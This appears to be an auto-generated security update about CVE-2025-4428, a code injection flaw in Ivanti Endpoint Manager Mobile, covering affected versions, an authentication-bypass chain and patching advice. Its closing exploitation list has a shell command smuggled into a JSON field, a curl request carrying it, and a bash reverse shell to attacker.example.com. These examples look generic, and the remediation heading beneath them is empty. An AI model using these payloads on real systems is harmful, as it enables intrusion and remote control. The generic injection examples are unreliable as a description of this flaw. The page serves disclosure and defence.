Ivanti EPMM: Remote Code Execution in Ivanti Endpoint Manager Mobile API (CVE-2025-4428) #shorts
Summary
Welcome to today’s security update. We’re discussing CVE-2025-4428, a critical remote code execution vulnerability in Ivanti Endpoint Manager Mobile. Disclosed in mid-May 2025 and confirmed exploited in the wild, this flaw allows attackers to run arbitrary code on vulnerable installations. Stay tuned as we break down the details and what you need to do to protect your environment.
Product details
Ivanti Endpoint Manager Mobile, also known as EPMM, is a unified endpoint management solution that secures and manages mobile devices across enterprises. The affected component is the EPMM API in version 12.5.0.0 and earlier on all supported platforms. Ivanti released version 12.5.0.1 which addresses this issue; earlier versions remain vulnerable.
Vulnerability type summary
CVE-2025-4428 stems from improper control of code generation, classified under CWE-94: Code Injection. The vulnerability exists in the API logic where crafted requests can manipulate the system’s execution flow, leading to unauthorized code injection and execution.
Details of the vulnerability
Authenticated users can send specially crafted API calls that inject malicious code into the EPMM server process. While this flaw alone requires valid credentials, security researchers at watchTowr Labs demonstrated an unauthenticated attack chain when combining CVE-2025-4427 (an authentication bypass issue) with CVE-2025-4428. This chain allows attackers to bypass login checks and then execute arbitrary payloads, fully compromising the management server. Ivanti confirmed active exploitation in targeted attacks, and CERT issued advisories urging immediate patching.
Conclusion
CVE-2025-4428 poses a severe risk to any organization running Ivanti EPMM 12.5.0.0 or earlier. Administrators should apply the 12.5.0.1 update without delay, review access logs for suspicious API activity, and ensure all mobile management endpoints are behind proper network controls. That’s all for this episode—stay vigilant and keep your systems patched.
Watch the full video on YouTube: CVE-2025-4428
Remediation and exploitation details
This chain involves the following actors
- Authenticated Attacker: Exploits the vulnerability to run code on the server
- IT Administrator: Maintains and secures the Ivanti Endpoint Manager Mobile server
This following systems are involved
- Ivanti Endpoint Manager Mobile (Enterprise mobile device management): Hosts the vulnerable application programming interface component
Attack entry point
- Mobile Application Programming Interface Endpoint: HTTP interface used for device management requests
Remediation actions
Exploitation actions
Login with stolen or guessed credentials
- Use phishing or credential stuffing to acquire a legitimate account
Manipulate request body data to include code injection
- Insert operating system commands into a JSON field, for example: {"deviceName":"test; uname -a"}
Remote code execution via crafted API call
- curl -X POST https://server.example.com/api/devices -H "Content-Type: application/json" -d '{"deviceName":"test; id"}'
Operating system command injection followed by reverse connection
- bash -i >& /dev/tcp/attacker.example.com/4444 0>&1
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM
- [2025-05-13] Ivanti confirms exploitation of vulnerabilities in EPMM, urges customers to patch.
- [2025-05-15] Ivanti EPMM Unauth RCE Chain (CVE-2025-4427 and CVE-2025-4428) vulnerability discovered by watchTowr Labs.
- [2025-05-16] CERT detected Ivanti issued a security advisory to fix the authentication bypass and remote code execution vulnerabilities (CVE-2025-4427/CVE-2025-4428) in Ivanti Endpoint Manager Mobile (EPMM).
- [2025-05-14] Ivanti released a security advisory for two vulnerabilities in its Endpoint Manager Mobile (EPMM) product.